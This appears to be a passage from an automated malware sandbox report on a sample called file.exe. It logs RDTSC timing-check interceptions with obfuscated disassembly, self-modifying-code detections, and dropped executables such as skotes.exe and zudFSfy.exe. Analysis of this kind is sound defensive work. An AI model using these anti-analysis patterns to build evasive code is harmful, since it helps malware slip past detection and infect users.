                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0031 second address: 4EC00AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F684908B765h 0x0000000a and ch, 00000076h 0x0000000d jmp 00007F684908B761h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 jmp 00007F684908B761h 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e call 00007F684908B75Ch 0x00000023 mov bx, si 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007F684908B75Dh 0x0000002f and ch, 00000036h 0x00000032 jmp 00007F684908B761h 0x00000037 popfd 0x00000038 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00AC second address: 4EC00DB instructions: 0x00000000 rdtsc 0x00000002 mov ax, 0B27h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b jmp 00007F684904922Ah 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007F6849049230h 0x00000018 xchg eax, ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00DB second address: 4EC00DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00DF second address: 4EC00E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00E5 second address: 4EC00EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 6691h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00EE second address: 4EC0113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F684904922Dh 0x0000000d xchg eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F684904922Dh 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0113 second address: 4EC0123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F684908B75Ch 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0123 second address: 4EC01B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 pushfd 0x00000011 jmp 00007F6849049231h 0x00000016 and ecx, 2D2B9F66h 0x0000001c jmp 00007F6849049231h 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007F6849049231h 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F6849049233h 0x00000033 sub cx, 774Eh 0x00000038 jmp 00007F6849049239h 0x0000003d popfd 0x0000003e mov dx, si 0x00000041 popad 0x00000042 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC01B1 second address: 4EC01E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b jmp 00007F684908B760h 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F684908B767h 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC01E6 second address: 4EC01EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC01EC second address: 4EC01F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC01F0 second address: 4EC0207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dl, B0h 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0207 second address: 4EC02D6 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 6A15E75Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ah, 9Ch 0x0000000b popad 0x0000000c xchg eax, esi 0x0000000d jmp 00007F684908B765h 0x00000012 mov esi, dword ptr [ebp+08h] 0x00000015 jmp 00007F684908B75Eh 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c jmp 00007F684908B75Dh 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F684908B761h 0x00000028 xchg eax, edi 0x00000029 pushad 0x0000002a mov ax, 7D53h 0x0000002e mov ecx, 66619BAFh 0x00000033 popad 0x00000034 test esi, esi 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F684908B760h 0x0000003d sbb eax, 58D58AD8h 0x00000043 jmp 00007F684908B75Bh 0x00000048 popfd 0x00000049 pushfd 0x0000004a jmp 00007F684908B768h 0x0000004f sub si, 5538h 0x00000054 jmp 00007F684908B75Bh 0x00000059 popfd 0x0000005a popad 0x0000005b je 00007F68BB0F9AB2h 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F684908B765h 0x00000068 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC02D6 second address: 4EC02DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC02DD second address: 4EC02F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC02F1 second address: 4EC02F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC02F5 second address: 4EC02FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC02FB second address: 4EC0366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6849049239h 0x00000009 sub ecx, 1C1DEFE6h 0x0000000f jmp 00007F6849049231h 0x00000014 popfd 0x00000015 mov ah, EAh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F68BB0B751Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F6849049234h 0x00000029 or eax, 4C555EB8h 0x0000002f jmp 00007F684904922Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0366 second address: 4EC039D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F684908B75Eh 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov dx, 0860h 0x0000001b mov al, bh 0x0000001d popad 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC039D second address: 4EC03FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007F6849049236h 0x00000014 jne 00007F68BB0B74E6h 0x0000001a jmp 00007F6849049230h 0x0000001f test byte ptr [esi+48h], 00000001h 0x00000023 jmp 00007F6849049230h 0x00000028 jne 00007F68BB0B74D5h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC03FD second address: 4EC0405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, bx 0x00000007 popad 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0405 second address: 4EC040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, al 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC040C second address: 4EC042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test bl, 00000007h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F684908B766h 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB084C second address: 4EB08AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F684904922Eh 0x00000013 sub eax, 5C97F5A8h 0x00000019 jmp 00007F684904922Bh 0x0000001e popfd 0x0000001f jmp 00007F6849049238h 0x00000024 popad 0x00000025 and esp, FFFFFFF8h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB08AD second address: 4EB0929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F684908B762h 0x00000009 sub esi, 398F8A68h 0x0000000f jmp 00007F684908B75Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F684908B768h 0x0000001b xor ch, FFFFFFC8h 0x0000001e jmp 00007F684908B75Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebx 0x00000028 jmp 00007F684908B766h 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F684908B75Dh 0x00000037 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0929 second address: 4EB093E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049231h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB093E second address: 4EB09AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F684908B75Eh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov cl, F5h 0x00000013 mov dx, 2E7Eh 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F684908B761h 0x00000022 adc ecx, 3E247A06h 0x00000028 jmp 00007F684908B761h 0x0000002d popfd 0x0000002e call 00007F684908B760h 0x00000033 pop eax 0x00000034 popad 0x00000035 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB09AB second address: 4EB09C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6849049237h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB09C6 second address: 4EB09CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB09CA second address: 4EB09E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6849049230h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB09E5 second address: 4EB0A8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F684908B767h 0x0000000b or esi, 7A89A3FEh 0x00000011 jmp 00007F684908B769h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov esi, dword ptr [ebp+08h] 0x0000001d pushad 0x0000001e mov esi, 1A71A9E3h 0x00000023 popad 0x00000024 sub ebx, ebx 0x00000026 jmp 00007F684908B75Bh 0x0000002b test esi, esi 0x0000002d jmp 00007F684908B766h 0x00000032 je 00007F68BB101090h 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b movsx ebx, ax 0x0000003e pushfd 0x0000003f jmp 00007F684908B766h 0x00000044 jmp 00007F684908B765h 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0A8E second address: 4EB0AB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049231h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0AB0 second address: 4EB0AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0AB4 second address: 4EB0AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0AB8 second address: 4EB0ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0ABE second address: 4EB0AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6849049231h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0C00 second address: 4EB0C3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F684908B767h 0x00000009 xor cx, 5F3Eh 0x0000000e jmp 00007F684908B769h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0C3C second address: 4EB0C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [ebp+14h] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F684904922Ah 0x00000011 xor si, 1C38h 0x00000016 jmp 00007F684904922Bh 0x0000001b popfd 0x0000001c push esi 0x0000001d push ebx 0x0000001e pop esi 0x0000001f pop edx 0x00000020 popad 0x00000021 push dword ptr [ebp+10h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F6849049238h 0x0000002d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0C87 second address: 4EB0C96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0C96 second address: 4EB0C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0CC1 second address: 4EC0CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F684908B764h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0CD9 second address: 4EC0D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov esi, 52A5DB4Bh 0x00000012 mov esi, 78F4E127h 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6849049238h 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0D12 second address: 4EC0D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F684908B75Eh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0D24 second address: 4EC0D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0D28 second address: 4EC0D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0D37 second address: 4EC0D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0D3B second address: 4EC0D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0D41 second address: 4EC0D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6849049235h 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0D69 second address: 4EC0D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0A34 second address: 4EC0A6D instructions: 0x00000000 rdtsc 0x00000002 mov cx, A79Bh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, 6F13h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F6849049236h 0x00000017 and ax, 4198h 0x0000001c jmp 00007F684904922Bh 0x00000021 popfd 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0A6D second address: 4EC0AE3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F684908B768h 0x00000008 jmp 00007F684908B765h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F684908B761h 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F684908B75Eh 0x0000001d mov ebp, esp 0x0000001f jmp 00007F684908B760h 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F684908B75Ah 0x0000002e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0AE3 second address: 4EC0AE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0AE9 second address: 4EC0AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40723 second address: 4F407B7 instructions: 0x00000000 rdtsc 0x00000002 mov si, 9B9Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6849049234h 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F6849049230h 0x00000014 push eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F6849049231h 0x0000001c and si, 6E26h 0x00000021 jmp 00007F6849049231h 0x00000026 popfd 0x00000027 mov di, cx 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c pushad 0x0000002d mov esi, 7A71FE4Fh 0x00000032 jmp 00007F6849049234h 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6849049237h 0x00000041 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F407B7 second address: 4F407BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F407BD second address: 4F407C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F407C1 second address: 4F407C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F407C5 second address: 4F40806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ecx 0x0000000d pushfd 0x0000000e jmp 00007F684904922Fh 0x00000013 xor ax, AC1Eh 0x00000018 jmp 00007F6849049239h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov bh, ch 0x00000023 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30A32 second address: 4F30A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 pushad 0x00000009 mov dh, E2h 0x0000000b push ecx 0x0000000c pop edi 0x0000000d popad 0x0000000e pushad 0x0000000f mov al, DCh 0x00000011 mov cl, bh 0x00000013 popad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F684908B75Fh 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30A5A second address: 4F30A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F684904922Dh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30A87 second address: 4F30AA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F684908B767h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3085C second address: 4F3086D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3086D second address: 4F3087E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F684908B75Ch 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0020 second address: 4ED002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F684904922Bh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED002F second address: 4ED0033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30CBC second address: 4F30CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 84ECFB instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 84EC24 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A179C3 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 84EC51 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: BDECFB instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: BDEC24 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: DA79C3 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: BDEC51 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeSpecial instruction interceptor: First address: 33A455 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeSpecial instruction interceptor: First address: 3615D3 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeSpecial instruction interceptor: First address: 3BE793 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: 4CF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: 5310000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: 6310000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: 6440000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: 7440000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: B670000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: C670000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: CB00000 memory reserve | memory write watchJump to behavior
